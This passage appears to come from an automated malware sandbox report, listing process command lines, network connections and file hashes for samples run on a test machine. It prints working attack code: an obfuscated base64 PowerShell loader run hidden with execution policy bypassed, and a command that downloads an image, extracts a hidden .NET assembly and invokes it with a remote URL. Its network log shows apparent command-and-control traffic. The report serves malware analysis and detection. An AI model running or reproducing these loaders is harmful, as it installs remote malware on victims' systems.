wBl#@$#G0#@$#YgBs#@$#Hk#@$#LgBH#@$#GU#@$#d#@$#BU#@$#Hk#@$#c#@$#Bl#@$#Cg#@$#JwBG#@$#Gk#@$#YgBl#@$#HI#@$#LgBI#@$#G8#@$#bQBl#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#B0#@$#Hk#@$#c#@$#Bl#@$#C4#@$#RwBl#@$#HQ#@$#TQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#K#@$##@$#n#@$#FY#@$#QQBJ#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#YQBy#@$#Gc#@$#dQBt#@$#GU#@$#bgB0#@$#HM#@$#I#@$##@$#9#@$#C#@$##@$#L#@$##@$#o#@$#Cc#@$#d#@$#B4#@$#HQ#@$#LgBz#@$#GU#@$#bgB5#@$#G0#@$#Lw#@$#4#@$#DQ#@$#Mg#@$#u#@$#DE#@$#NQ#@$#u#@$#DY#@$#Nw#@$#u#@$#D#@$##@$#O#@$##@$#v#@$#C8#@$#OgBw#@$#HQ#@$#d#@$#Bo#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#LgBJ#@$#G4#@$#dgBv#@$#Gs#@$#ZQ#@$#o#@$#CQ#@$#bgB1#@$#Gw#@$#b#@$##@$#s#@$#C#@$##@$#J#@$#Bh#@$#HI#@$#ZwB1#@$#G0#@$#ZQBu#@$#HQ#@$#cw#@$#p#@$##@$#==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('#@$#','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.senym/842.15.67.08//:ptth');$method.Invoke($null, $arguments)"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ipconfig /renew

C:\Users\Admin\AppData\Local\Tempwinlogon.exe

"C:\Users\Admin\AppData\Local\Tempwinlogon.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe"

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /renew

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aug.vbs"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TGDEJN.vbs"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff6d0e46f8,0x7fff6d0e4708,0x7fff6d0e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 444 -p 388 -ip 388

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 388 -s 3664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2548 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 440 -p 4608 -ip 4608

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4608 -s 3644

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\69902a92d8b14946b5ce20cbff6aa3aa /t 3204 /p 436

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 628 -p 3740 -ip 3740

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3740 -s 3440

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 404 -p 3204 -ip 3204

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3204 -s 4092

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3204 -s 4092

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 600 -p 4412 -ip 4412

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4412 -s 3676

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4892.0.1728769490\1348298946" -parentBuildID 20221007134813 -prefsHandle 1784 -prefMapHandle 1776 -prefsLen 20938 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63b6619b-8869-4c1c-b544-288163fb025b} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" 1944 1c2bfbd7c58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4892.1.1884509601\1799933842" -parentBuildID 20221007134813 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 20974 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b20167a8-cc63-47aa-89e5-91e8544779f1} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" 2412 1c2bf6e2258 socket

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 126.133.255.8.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 2.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 grapemundo.com udp
IN 103.50.163.157:443 grapemundo.com tcp
US 8.8.8.8:53 157.163.50.103.in-addr.arpa udp
US 8.8.8.8:53 142.33.222.23.in-addr.arpa udp
US 8.8.8.8:53 129.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 chongmei33.publicvm.com udp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 122.144.47.103.in-addr.arpa udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 gstatic-node.io udp
US 188.114.97.0:80 gstatic-node.io tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 188.114.97.0:80 gstatic-node.io tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 9.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.237.62.211:443 api.ipify.org tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 211.62.237.104.in-addr.arpa udp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 8.8.8.8:53 onedrive.live.com udp
US 158.101.44.242:80 checkip.dyndns.org tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 y1qk5g.dm.files.1drv.com udp
US 8.8.8.8:53 13.42.107.13.in-addr.arpa udp
US 8.8.8.8:53 242.44.101.158.in-addr.arpa udp
US 13.107.42.12:443 y1qk5g.dm.files.1drv.com tcp
US 8.8.8.8:53 12.42.107.13.in-addr.arpa udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 www.rainbow-industrie.com udp
FR 178.32.90.242:2550 www.rainbow-industrie.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 8.8.8.8:53 242.90.32.178.in-addr.arpa udp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 104.237.62.211:443 api.ipify.org tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 104.237.62.211:443 api.ipify.org tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 8.8.8.8:53 uploaddeimagens.com.br udp
US 188.114.96.0:443 uploaddeimagens.com.br tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 chongmei33.publicvm.com udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 158.101.44.242:80 checkip.dyndns.org tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 chongmei33.publicvm.com udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
N/A 224.0.0.251:5353 udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 173.117.168.52.in-addr.arpa udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 8.8.8.8:53 chongmei33.publicvm.com udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp

Files

memory/1712-343-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-345-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-344-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-347-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-346-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-348-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-349-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-350-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-351-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-352-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-353-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-354-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-355-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-356-0x00007FFF3EF40000-0x00007FFF3EF50000-memory.dmp

memory/1712-357-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-358-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-359-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-360-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-361-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-362-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-363-0x00007FFF3EF40000-0x00007FFF3EF50000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\0bc5ba29090a537426e9f198bc924a23403155a2dcb848a58280f6205f4fd6c1.xls

MD5 dcaec797dfb93816d1feac477c300d5c
SHA1 597e6bc9dcf65338704937865f0755a9869f9cb7
SHA256 0bc5ba29090a537426e9f198bc924a23403155a2dcb848a58280f6205f4fd6c1
SHA512 59b996e37339e4f4b7726897328cb5e64012409bbafa2a4de42513d43b5fb11d6fe11569e1d67fb29d08a7c47731ca0686a403b7126c02b7a8cefcedf9f613d0

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 bca3d4d518a06072977c41ea814a2311
SHA1 75516f0730abd2b15b7a970f18a5246064b8bee9
SHA256 9cc6a254dcee27af8848cbefdd392d44d04437d2c8b9cebb76175a68ea53c09a
SHA512 00640d5eb4b508f723007968354b54edc44b3bdc1088ae20f84544bab6e0631bdd07fad6e172172100c267fb687991f04ca8e85e6cf1480c2a67a96fa1d20a46

memory/1712-381-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-382-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-386-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\424402D6.emf

MD5 d69c22a341e111feea69df6d8c655d60
SHA1 ac862337f2efa43627508927f5052ce694012206
SHA256 05b2053bf1d070d6034b45cd79b54d80da3c6d88d016671a345e75048b1a68db
SHA512 d4db33ed046b3c9ba09c4b3feac17b1fe2e75fce67f4154fd795d504708c295a1e3c8331ed3d6c3ee9950c936c4cc25b5d690558c26f2e1f7771bd5eb275822c

memory/1712-414-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-415-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-416-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-417-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-418-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe

MD5 f6bf7f27897a06a9d811732cd9b608e1
SHA1 296735e8d8ebc474eba089c62f71189fe1d00bd0
SHA256 0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35
SHA512 94790415406989c9e9cf31e104f6fff2c0ba37ce110ba3496ae0e12fb6a4cb5accfa202ba5c40a0cb2153449647086a251393fb4ae35701a07be388c5a57e7f6

C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe

MD5 f6bf7f27897a06a9d811732cd9b608e1
SHA1 296735e8d8ebc474eba089c62f71189fe1d00bd0
SHA256 0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35
SHA512 94790415406989c9e9cf31e104f6fff2c0ba37ce110ba3496ae0e12fb6a4cb5accfa202ba5c40a0cb2153449647086a251393fb4ae35701a07be388c5a57e7f6

C:\comRuntimeCrtdll\reJQeYd4I.vbe

MD5 1a8884c5e14f4476a570017d2310f0ff
SHA1 f59490edeba91d4b2577510620efa8f74832623d
SHA256 0f903634014fca7fce912192778138a5978ba372f5b47ca9837d193d1df20569
SHA512 6e08ed4b5048a2e55fc2ec9e584a38238c68c714d45b983b13087ea41832f7622692a482c634caa36f175fcf8bca47f4770a0a8bb40c3f763a50730cf109e1b3

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

MD5 a9a44220f7819f03d7b8474033b169ee
SHA1 0f0bf5382702736838907fd65e5dd7e50616f305
SHA256 1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa
SHA512 255bc358ad925873d382461ad5000f9f55d96c10751a5c682882cee61e363dbbbba2eb405c91ab3ae12df343e84ce9bf04f0e866846317e5ac5288e9d9eb549b

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

MD5 a9a44220f7819f03d7b8474033b169ee
SHA1 0f0bf5382702736838907fd65e5dd7e50616f305
